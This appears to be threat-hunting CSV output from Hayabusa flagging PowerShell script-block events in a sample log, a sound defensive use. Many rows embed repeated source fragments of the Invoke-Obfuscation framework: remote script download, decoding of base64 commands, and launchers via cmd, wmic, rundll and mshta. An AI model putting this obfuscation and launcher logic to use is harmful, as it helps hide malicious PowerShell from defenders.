$NextCliCommand = $Script:CliCommands.Trim() $Script:CliCommands = @() } Else { $NextCliCommand = ([String]$Script:CliCommands[0]).Trim() $Script:CliCommands = For($i=1; $i -lt $Script:CliCommands.Count; $i++) {$Script:CliCommands[$i]} } $UserInput = $NextCliCommand } Else { # If Command was defined on command line and NoExit switch was not defined then output final ObfuscatedCommand to stdout and then quit. Otherwise continue with interactive Invoke-Obfuscation. If($CliWasSpecified -AND ($Script:CliCommands.Count -lt 1) -AND ($Script:CompoundCommand.Count -lt 1) -AND ($Script:QuietWasSpecified -OR !$NoExitWasSpecified)) { If($Script:QuietWasSpecified) { # Remove Write-Host and Start-Sleep proxy functions so that Write-Host and Start-Sleep cmdlets will be called during the remainder of the interactive Invoke-Obfuscation session. Remove-Item -Path Function:Write-Host Remove-Item -Path Function:Start-Sleep $Script:QuietWasSpecified = $FALSE # Automatically run 'Show Options' so the user has context of what has successfully been executed. $UserInput = 'show options' $BreadCrumb = 'Show Options' } # -NoExit wasn't specified and -Command was, so we will output the result back in the main While loop. If(!$NoExitWasSpecified) { $UserInput = 'quit' } } Else { $UserInput = (Read-Host).Trim() } # Process interactive UserInput using CLI syntax, so comma-delimited and slash-delimited commands can be processed interactively. If(($Script:CliCommands.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND $UserInput.Contains(',')) { $Script:CliCommands = $UserInput.Split(',') # Reset $UserInput so current While loop will be traversed once more and process UserInput command as a CliCommand. $UserInput = '' } } } # Trim any leading trailing slashes so it doesn't misinterpret it as a compound command unnecessarily. $UserInput = $UserInput.Trim('/\') # Cause UserInput of base menu level directories to automatically work. # The only exception is STRING if the current MenuName is _token since it can be the base menu STRING or TOKEN/STRING. If((($MenuLevel | ForEach-Object {$_[1].Trim()}) -Contains $UserInput.Split('/\')[0]) -AND !(('string' -Contains $UserInput.Split('/\')[0]) -AND ($MenuName -eq '_token')) -AND ($MenuName -ne '')) { $UserInput = 'home/' + $UserInput.Trim() } # If current command contains \ or / and does not start with SET or OUT then we are dealing with a compound command. # Setting $Script:CompounCommand in below IF block. If(($Script:CompoundCommand.Count -eq 0) -AND !$UserInput.ToLower().StartsWith('set ') -AND !$UserInput.ToLower().StartsWith('out ') -AND ($UserInput.Contains('\') -OR $UserInput.Contains('/'))) { $Script:CompoundCommand = $UserInput.Split('/\') } # If current command contains \ or / and does not start with SET then we are dealing with a compound command. # Parsing out next command from $Script:CompounCommand in below IF block. If($Script:CompoundCommand.Count -gt 0) { $UserInput = '' While(($UserInput -eq '') -AND ($Script:CompoundCommand.Count -gt 0)) { # If last compound command then it will be a string. If($Script:CompoundCommand.GetType().Name -eq 'String') { $NextCompoundCommand = $Script:CompoundCommand.Trim() $Script:CompoundCommand = @() } Else { # If there are more commands left in compound command then it won't be a string (above IF block). # In this else block we get the next command from CompoundCommand array. $NextCompoundCommand = ([String]$Script:CompoundCommand[0]).Trim() # Set remaining commands back into CompoundCommand. $Temp = $Script:CompoundCommand $Script:CompoundCommand = @() For($i=1; $i -lt $Temp.Count; $i++) { $Script:CompoundCommand += $Temp[$i] } } $UserInput = $NextCompoundCommand } } # Handle new RegEx functionality. # Identify if there is any regex in current UserInput by removing all alphanumeric characters (and + or # which are found in launcher names). $TempUserInput = $UserInput.ToLower() @(97..122) | ForEach-Object {$TempUserInput = $TempUserInput.Replace([String]([Char]$_),'')} @(0..9) | ForEach-Object {$TempUserInput = $TempUserInput.Replace($_,'')} $TempUserInput = $TempUserInput.Replace(' ','').Replace('+','').Replace('#','').Replace('\','').Replace('/','').Replace('-','').Replace('?','') If(($TempUserInput.Length -gt 0) -AND !($UserInput.Trim().ToLower().StartsWith('set ')) -AND !($UserInput.Trim().ToLower().StartsWith('out '))) { # Replace any simple wildcard with .* syntax. $UserInput = $UserInput.Replace('.*','_____').Replace('*','.*').Replace('_____','.*') # Prepend UserInput with ^ and append with $ if not already there. If(!$UserInput.Trim().StartsWith('^') -AND !$UserInput.Trim().StartsWith('.*')) { $UserInput = '^' + $UserInput } If(!$UserInput.Trim().EndsWith('$') -AND !$UserInput.Trim().EndsWith('.*')) { $UserInput = $UserInput + '$' } # See if there are any filtered matches in the current menu. Try { $MenuFiltered = ($Menu | Where-Object {($_[1].Trim() -Match $UserInput) -AND ($_[1].Trim().Length -gt 0)} | ForEach-Object {$_[1].Trim()}) } Catch { # Output error message if Regular Expression causes error in ab",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,low,Evas,Use Remove-Item to Delete File,,rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ove filtering step. # E.g. Using *+ instead of *[+] Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' The current Regular Expression caused the following error:' write-host "" $_"" -ForegroundColor Red } # If there are filtered matches in the current menu then randomly choose one for the UserInput value. If($MenuFiltered -ne $NULL) { # Randomly select UserInput from filtered options. $UserInput = (Get-Random -Input $MenuFiltered).Trim() # Output randomly chosen option (and filtered options selected from) if more than one option were returned from regex. If($MenuFiltered.Count -gt 1) { # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host ""`n`nRandomly selected "" -NoNewline Write-Host $UserInput -NoNewline -ForegroundColor $ColorToOutput write-host "" from the following filtered options: "" -NoNewline For($i=0; $i -lt $MenuFiltered.Count-1; $i++) { Write-Host $MenuFiltered[$i].Trim() -NoNewLine -ForegroundColor $ColorToOutput Write-Host ', ' -NoNewLine } Write-Host $MenuFiltered[$MenuFiltered.Count-1].Trim() -NoNewLine -ForegroundColor $ColorToOutput } } } # If $UserInput is all numbers and is in a menu in $MenusWithMultiSelectNumbers $OverrideAcceptableInput = $FALSE $MenusWithMultiSelectNumbers = @('\Launcher') If(($UserInput.Trim(' 0123456789').Length -eq 0) -AND $BreadCrumb.Contains('\') -AND ($MenusWithMultiSelectNumbers -Contains $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')))) { $OverrideAcceptableInput = $TRUE } If($ExitInputOptions -Contains $UserInput.ToLower()) { Return $ExitInputOptions[0] } ElseIf($MenuInputOptions -Contains $UserInput.ToLower()) { # Commands like 'back' that will return user to previous interactive menu. If($BreadCrumb.Contains('\')) {$UserInput = $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')).Replace('\','_')} Else {$UserInput = ''} Return $UserInput.ToLower() } ElseIf($HomeMenuInputOptions[0] -Contains $UserInput.ToLower()) { Return $UserInput.ToLower() } ElseIf($UserInput.ToLower().StartsWith('set ')) { # Extract $UserInputOptionName and $UserInputOptionValue from $UserInput SET command. $UserInputOptionName = $NULL $UserInputOptionValue = $NULL $HasError = $FALSE $UserInputMinusSet = $UserInput.SubString(4).Trim() If($UserInputMinusSet.IndexOf(' ') -eq -1) { $HasError = $TRUE $UserInputOptionName = $UserInputMinusSet.Trim() } Else { $UserInputOptionName = $UserInputMinusSet.SubString(0,$UserInputMinusSet.IndexOf(' ')).Trim().ToLower() $UserInputOptionValue = $UserInputMinusSet.SubString($UserInputMinusSet.IndexOf(' ')).Trim() } # Validate that $UserInputOptionName is defined in $SettableInputOptions. If($SettableInputOptions -Contains $UserInputOptionName) { # Perform separate validation for $UserInputOptionValue before setting value. Set to 'emptyvalue' if no value was entered. If($UserInputOptionValue.Length -eq 0) {$UserInputOptionName = 'emptyvalue'} Switch($UserInputOptionName.ToLower()) { 'scriptpath' { If($UserInputOptionValue -AND ((Test-Path $UserInputOptionValue) -OR ($UserInputOptionValue -Match '(http|https)://'))) { # Reset ScriptBlock in case it contained a value. $Script:ScriptBlock = '' # Check if user-input ScriptPath is a URL or a directory. If($UserInputOptionValue -Match '(http|https)://') { # ScriptPath is a URL. # Download content. $Script:ScriptBlock = (New-Object Net.WebClient).DownloadString($UserInputOptionValue) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath (as URL):"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } ElseIf ((Get-Item $UserInputOptionValue) -is [System.IO.DirectoryInfo]) { # ScriptPath does not exist. Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path is a directory instead of a file (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } Else { # Read contents from user-input ScriptPath value. Get-ChildItem $UserInputOptionValue -ErrorAction Stop | Out-Null $Script:ScriptBlock = [IO.File]::ReadAllText((Resolve-Path $UserInputOptionValue)) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath:"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } } Else { # ScriptPath not found (failed Test-Path). Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path not found (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } } 'scriptblock' { # Remove evenly paired {} '' or """" if user includes it around their scriptblock input. ForEach($Char in @(@('{','}'),@('""','""'),@(""'"",""'""))) { While($UserInputOptionValue.StartsWith($Char[0]) -AND $UserInputOptionValue.EndsWith($Char[1])) { $UserInputOptionValue = $UserInputOptionValue.SubString(1,$UserInputOptionValue.Length-2).Trim() } } # Check if input is PowerShell encoded command syntax so we can decode for scriptblock. If($UserInputOptionValue -Match 'powershell(.exe | )\s*-(e |ec |en |enc |enco |encod |encode)\s*[""'']*[a-z=]') { # Extract encoded command. $EncodedCommand = $UserInputOptionValue.SubString($UserInputOptionValue.ToLower().IndexOf(' -e')+3) $EncodedCommand = $EncodedCommand.SubString($EncodedCommand.IndexOf(' ')).Trim("" '`"""") # Decode Unicode-encoded $EncodedCommand $UserInputOptionValue = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedCommand)) } # Set script-wide variables for future reference. $Script:ScriptPath = 'N/A' $Script:ScriptBlock = $UserInputOptionValue $Script:ObfuscatedCommand = $UserInputOptionValue $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $UserInputOptionValue $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptBlock:"" -ForegroundColor Cyan Write-Host $Script:ScriptBlock -ForegroundColor Magenta } 'emptyvalue' { # No OPTIONVALUE was entered after OPTIONNAME. $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' No value was entered after' -NoNewLine Write-Host ' SCRIPTBLOCK/SCRIPTPATH' -NoNewLine -ForegroundColor Cyan Write-Host '.' -NoNewLine } default {Write-Error ""An invalid OPTIONNAME ($UserInputOptionName) was passed to switch block.""; Exit} } } Else { $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' OPTIONNAME' -NoNewLine Write-Host "" $UserInputOptionName"" -NoN",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"ove filtering step. # E.g. Using *+ instead of *[+] Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' The current Regular Expression caused the following error:' write-host "" $_"" -ForegroundColor Red } # If there are filtered matches in the current menu then randomly choose one for the UserInput value. If($MenuFiltered -ne $NULL) { # Randomly select UserInput from filtered options. $UserInput = (Get-Random -Input $MenuFiltered).Trim() # Output randomly chosen option (and filtered options selected from) if more than one option were returned from regex. If($MenuFiltered.Count -gt 1) { # Change color and verbiage if acceptable options will execute an obfuscation function. If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host ""`n`nRandomly selected "" -NoNewline Write-Host $UserInput -NoNewline -ForegroundColor $ColorToOutput write-host "" from the following filtered options: "" -NoNewline For($i=0; $i -lt $MenuFiltered.Count-1; $i++) { Write-Host $MenuFiltered[$i].Trim() -NoNewLine -ForegroundColor $ColorToOutput Write-Host ', ' -NoNewLine } Write-Host $MenuFiltered[$MenuFiltered.Count-1].Trim() -NoNewLine -ForegroundColor $ColorToOutput } } } # If $UserInput is all numbers and is in a menu in $MenusWithMultiSelectNumbers $OverrideAcceptableInput = $FALSE $MenusWithMultiSelectNumbers = @('\Launcher') If(($UserInput.Trim(' 0123456789').Length -eq 0) -AND $BreadCrumb.Contains('\') -AND ($MenusWithMultiSelectNumbers -Contains $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')))) { $OverrideAcceptableInput = $TRUE } If($ExitInputOptions -Contains $UserInput.ToLower()) { Return $ExitInputOptions[0] } ElseIf($MenuInputOptions -Contains $UserInput.ToLower()) { # Commands like 'back' that will return user to previous interactive menu. If($BreadCrumb.Contains('\')) {$UserInput = $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')).Replace('\','_')} Else {$UserInput = ''} Return $UserInput.ToLower() } ElseIf($HomeMenuInputOptions[0] -Contains $UserInput.ToLower()) { Return $UserInput.ToLower() } ElseIf($UserInput.ToLower().StartsWith('set ')) { # Extract $UserInputOptionName and $UserInputOptionValue from $UserInput SET command. $UserInputOptionName = $NULL $UserInputOptionValue = $NULL $HasError = $FALSE $UserInputMinusSet = $UserInput.SubString(4).Trim() If($UserInputMinusSet.IndexOf(' ') -eq -1) { $HasError = $TRUE $UserInputOptionName = $UserInputMinusSet.Trim() } Else { $UserInputOptionName = $UserInputMinusSet.SubString(0,$UserInputMinusSet.IndexOf(' ')).Trim().ToLower() $UserInputOptionValue = $UserInputMinusSet.SubString($UserInputMinusSet.IndexOf(' ')).Trim() } # Validate that $UserInputOptionName is defined in $SettableInputOptions. If($SettableInputOptions -Contains $UserInputOptionName) { # Perform separate validation for $UserInputOptionValue before setting value. Set to 'emptyvalue' if no value was entered. If($UserInputOptionValue.Length -eq 0) {$UserInputOptionName = 'emptyvalue'} Switch($UserInputOptionName.ToLower()) { 'scriptpath' { If($UserInputOptionValue -AND ((Test-Path $UserInputOptionValue) -OR ($UserInputOptionValue -Match '(http|https)://'))) { # Reset ScriptBlock in case it contained a value. $Script:ScriptBlock = '' # Check if user-input ScriptPath is a URL or a directory. If($UserInputOptionValue -Match '(http|https)://') { # ScriptPath is a URL. # Download content. $Script:ScriptBlock = (New-Object Net.WebClient).DownloadString($UserInputOptionValue) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath (as URL):"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } ElseIf ((Get-Item $UserInputOptionValue) -is [System.IO.DirectoryInfo]) { # ScriptPath does not exist. Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path is a directory instead of a file (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } Else { # Read contents from user-input ScriptPath value. Get-ChildItem $UserInputOptionValue -ErrorAction Stop | Out-Null $Script:ScriptBlock = [IO.File]::ReadAllText((Resolve-Path $UserInputOptionValue)) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath:"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } } Else { # ScriptPath not found (failed Test-Path). Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path not found (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } } 'scriptblock' { # Remove evenly paired {} '' or """" if user includes it around their scriptblock input. ForEach($Char in @(@('{','}'),@('""','""'),@(""'"",""'""))) { While($UserInputOptionValue.StartsWith($Char[0]) -AND $UserInputOptionValue.EndsWith($Char[1])) { $UserInputOptionValue = $UserInputOptionValue.SubString(1,$UserInputOptionValue.Length-2).Trim() } } # Check if input is PowerShell encoded command syntax so we can decode for scriptblock. If($UserInputOptionValue -Match 'powershell(.exe | )\s*-(e |ec |en |enc |enco |encod |encode)\s*[""'']*[a-z=]') { # Extract encoded command. $EncodedCommand = $UserInputOptionValue.SubString($UserInputOptionValue.ToLower().IndexOf(' -e')+3) $EncodedCommand = $EncodedCommand.SubString($EncodedCommand.IndexOf(' ')).Trim("" '`"""") # Decode Unicode-encoded $EncodedCommand $UserInputOptionValue = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedCommand)) } # Set script-wide variables for future reference. $Script:ScriptPath = 'N/A' $Script:ScriptBlock = $UserInputOptionValue $Script:ObfuscatedCommand = $UserInputOptionValue $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $UserInputOptionValue $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptBlock:"" -ForegroundColor Cyan Write-Host $Script:ScriptBlock -ForegroundColor Magenta } 'emptyvalue' { # No OPTIONVALUE was entered after OPTIONNAME. $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' No value was entered after' -NoNewLine Write-Host ' SCRIPTBLOCK/SCRIPTPATH' -NoNewLine -ForegroundColor Cyan Write-Host '.' -NoNewLine } default {Write-Error ""An invalid OPTIONNAME ($UserInputOptionName) was passed to switch block.""; Exit} } } Else { $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' OPTIONNAME' -NoNewLine Write-Host "" $UserInputOptionName"" -NoN",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ewLine -ForegroundColor Cyan Write-Host "" is not a settable option."" -NoNewLine } If($HasError) { Write-Host ""`n Correct syntax is"" -NoNewLine Write-Host ' SET OPTIONNAME VALUE' -NoNewLine -ForegroundColor Green Write-Host '.' -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' SHOW OPTIONS' -NoNewLine -ForegroundColor Yellow Write-Host ' for more details.' } } ElseIf(($AcceptableInput -Contains $UserInput) -OR ($OverrideAcceptableInput)) { # User input matches $AcceptableInput extracted from the current $Menu, so decide if: # 1) an obfuscation function needs to be called and remain in current interactive prompt, or # 2) return value to enter into a new interactive prompt. # Format breadcrumb trail to successfully retrieve the next interactive prompt. $UserInput = $BreadCrumb.Trim('\').Replace('\','_') + '_' + $UserInput If($BreadCrumb.StartsWith('\')) {$UserInput = '_' + $UserInput} # If the current selection contains a command to execute then continue. Otherwise return to go to another menu. If($SelectionContainsCommand) { # Make sure user has entered command or path to script. If($Script:ObfuscatedCommand -ne $NULL) { # Iterate through lines in $Menu to extract command for the current selection in $UserInput. ForEach($Line in $Menu) { If($Line[1].Trim(' ') -eq $UserInput.SubString($UserInput.LastIndexOf('_')+1)) {$CommandToExec = $Line[3]; Continue} } If(!$OverrideAcceptableInput) { # Extract arguments from $CommandToExec. $Function = $CommandToExec[0] $Token = $CommandToExec[1] $ObfLevel = $CommandToExec[2] } Else { # Overload above arguments if $OverrideAcceptableInput is $TRUE, and extract $Function from $BreadCrumb Switch($BreadCrumb.ToLower()) { '\launcher\ps' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 1} '\launcher\cmd' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 2} '\launcher\wmic' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 3} '\launcher\rundll' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 4} '\launcher\var+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 5} '\launcher\stdin+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 6} '\launcher\clip+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 7} '\launcher\var++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 8} '\launcher\stdin++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 9} '\launcher\clip++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 10} '\launcher\rundll++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 11} '\launcher\mshta++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 12} default {Write-Error ""An invalid value ($($BreadCrumb.ToLower())) was passed to switch block for setting `$Function when `$OverrideAcceptableInput -eq `$TRUE.""; Exit} } # Extract $ObfLevel from first element in array (in case 0th element is used for informational purposes), and extract $Token from $BreadCrumb. $ObfLevel = $Menu[1][3][2] $Token = $UserInput.SubString($UserInput.LastIndexOf('_')+1) } # Convert ObfuscatedCommand (string) to ScriptBlock for next obfuscation function. If(!($Script:LauncherApplied)) { $ObfCommandScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock($Script:ObfuscatedCommand) } # Validate that user has set SCRIPTPATH or SCRIPTBLOCK (by seeing if $Script:ObfuscatedCommand is empty). If($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute obfuscation commands without setting ScriptPath or ScriptBlock values in SHOW OPTIONS menu. Set these by executing"" -NoNewLine Write-Host ' SET SCRIPTBLOCK script_block_or_command' -NoNewLine -ForegroundColor Green Write-Host ' or' -NoNewLine Write-Host ' SET SCRIPTPATH path_to_script_or_URL' -NoNewLine -ForegroundColor Green Write-Host '.' Continue } # Save current ObfuscatedCommand to see if obfuscation was successful (i.e. no warnings prevented obfuscation from occurring). $ObfuscatedCommandBefore = $Script:ObfuscatedCommand $CmdToPrint = $NULL If($Script:LauncherApplied) { If($Function -eq 'Out-PowerShellLauncher') { $ErrorMessage = ' You have already applied a launcher to ObfuscatedCommand.' } Else { $ErrorMessage = ' You cannot obfuscate after applying a Launcher to ObfuscatedCommand.' } Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' UNDO' -NoNewLine -ForegroundColor Yellow Write-Host "" to remove the launcher from ObfuscatedCommand.`n"" -NoNewLine } Else { # Switch block to route to the correct function. Switch($Function) { 'Out-ObfuscatedTokenCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $Token $ObfLevel $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","" '$Token' $ObfLevel"") } 'Out-ObfuscatedTokenCommandAll' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","""") } 'Out-ObfuscatedStringCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedStringCommand -ScriptBlock $ObfCommandScriptBlock $ObfLevel $CmdToPrint = @(""Out-ObfuscatedStringCommand -ScriptBlock "","" $ObfLevel"") } 'Out-EncodedAsciiCommand' { $Script:ObfuscatedCommand = Out-EncodedAsciiCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedAsciiCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedHexCommand' { $Script:ObfuscatedCommand = Out-EncodedHexCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedHexCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedOctalCommand' { $Script:ObfuscatedCommand = Out-EncodedOctalCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedOctalCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBinaryCommand' { $Script:ObfuscatedCommand = Out-EncodedBinaryCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBinaryCommand -ScriptBlock "","" -PassThru"") } 'Out-SecureStringCommand' { $Script:ObfuscatedCommand = Out-SecureStringCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-SecureStringCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBXORCommand' { $Script:ObfuscatedCommand = Out-EncodedBXORCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBXORCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedSpecialCharOnlyCommand' { $Script:ObfuscatedCommand = Out-EncodedSpecialCharOnlyCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedSpecialCharOnlyCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedWhitespaceCommand' { $Script:ObfuscatedCommand = Out-EncodedWhitespaceCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedWhitespaceCommand -ScriptBlock "","" -PassThru"") } 'Out-PowerShellLauncher' { # Extract numbers from string so we can output proper flag syntax in ExecutionCommands history. $SwitchesAsStringArray = [char[]]$Token | Sort-Object -Unique | Where-Object {$_ -ne ' '} If($SwitchesAsStringArray -Contains '0') { $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $ObfLevel"") } Else { $HasWindowStyle = $FALSE $SwitchesToPrint = @() ForEach($Value in $SwitchesAsStringArray) { Switch($Value)",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.300 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"ewLine -ForegroundColor Cyan Write-Host "" is not a settable option."" -NoNewLine } If($HasError) { Write-Host ""`n Correct syntax is"" -NoNewLine Write-Host ' SET OPTIONNAME VALUE' -NoNewLine -ForegroundColor Green Write-Host '.' -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' SHOW OPTIONS' -NoNewLine -ForegroundColor Yellow Write-Host ' for more details.' } } ElseIf(($AcceptableInput -Contains $UserInput) -OR ($OverrideAcceptableInput)) { # User input matches $AcceptableInput extracted from the current $Menu, so decide if: # 1) an obfuscation function needs to be called and remain in current interactive prompt, or # 2) return value to enter into a new interactive prompt. # Format breadcrumb trail to successfully retrieve the next interactive prompt. $UserInput = $BreadCrumb.Trim('\').Replace('\','_') + '_' + $UserInput If($BreadCrumb.StartsWith('\')) {$UserInput = '_' + $UserInput} # If the current selection contains a command to execute then continue. Otherwise return to go to another menu. If($SelectionContainsCommand) { # Make sure user has entered command or path to script. If($Script:ObfuscatedCommand -ne $NULL) { # Iterate through lines in $Menu to extract command for the current selection in $UserInput. ForEach($Line in $Menu) { If($Line[1].Trim(' ') -eq $UserInput.SubString($UserInput.LastIndexOf('_')+1)) {$CommandToExec = $Line[3]; Continue} } If(!$OverrideAcceptableInput) { # Extract arguments from $CommandToExec. $Function = $CommandToExec[0] $Token = $CommandToExec[1] $ObfLevel = $CommandToExec[2] } Else { # Overload above arguments if $OverrideAcceptableInput is $TRUE, and extract $Function from $BreadCrumb Switch($BreadCrumb.ToLower()) { '\launcher\ps' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 1} '\launcher\cmd' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 2} '\launcher\wmic' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 3} '\launcher\rundll' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 4} '\launcher\var+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 5} '\launcher\stdin+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 6} '\launcher\clip+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 7} '\launcher\var++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 8} '\launcher\stdin++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 9} '\launcher\clip++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 10} '\launcher\rundll++' {$Function = 